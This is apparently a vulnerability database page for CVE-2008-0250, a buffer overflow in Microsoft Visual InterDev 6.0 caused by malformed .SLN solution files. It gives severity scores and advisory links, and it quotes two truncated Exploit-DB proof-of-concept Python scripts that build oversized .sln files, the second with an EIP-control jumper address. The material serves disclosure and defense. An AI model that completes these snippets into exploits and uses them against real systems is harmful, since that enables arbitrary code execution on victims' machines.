CVE-2008-0250
Published 2008-01-12
CVE-2008-0250: Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long…
Priority P345 · critical · 9.3 · CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 16.89% (96.7th percentile)
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | visual_interdev | — | — |
GHSA
GHSA-7h4m-3669-q86j: Buffer overflow in Microsoft Visual InterDev 6
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2008-1709 [CRITICAL] CWE-119 GHSA-7h4m-3669-q86j: Buffer overflow in Microsoft Visual InterDev 6
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250.
GHSA
GHSA-5gfj-3p52-jpc3: Buffer overflow in Microsoft Visual InterDev 6
ghsa_unreviewed·2022-05-01
CVE-2008-0250 [HIGH] CWE-119 GHSA-5gfj-3p52-jpc3: Buffer overflow in Microsoft Visual InterDev 6
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line.
No detection rules found.
Exploit-DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
exploitdb·2008-04-03
CVE-2008-1709 Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
---
```python
#usage: exploit.py FileName
import sys

print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"

buff = "a" * 264 + "bbbb" + "c" * 256

try:
    sln_file = \
    'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
    'Project("{}") = "' + buff + '"\n'+\
    'EndProject\n'
    out_file = open(sys.argv[1] + ".sln",'w'
```
Exploit-DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
exploitdb·2008-01-11
CVE-2008-1709 Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
---
```python
#usage: exploit.py FileName
import sys

print "------------------------------------------------------------------------"
print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " I really have much fun exploiting this one :)"
print " We need to patch five exceptions before we can have EIP:\n"
print " #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL"
print " #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF"
print "------------------------------------------------------------------------"

buff = "A" * 1764
jumper = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
buff2 = "A" * 4
buff3 =
```
No writeups or analysis indexed.
http://secunia.com/advisories/28482
http://shinnai.altervista.org/exploits/txt/TXT_PoEOrFM8py30PXrDF7IY.html
http://www.securityfocus.com/bid/27250
https://exchange.xforce.ibmcloud.com/vulnerabilities/41826
https://www.exploit-db.com/exploits/4892
Published: 2008-01-12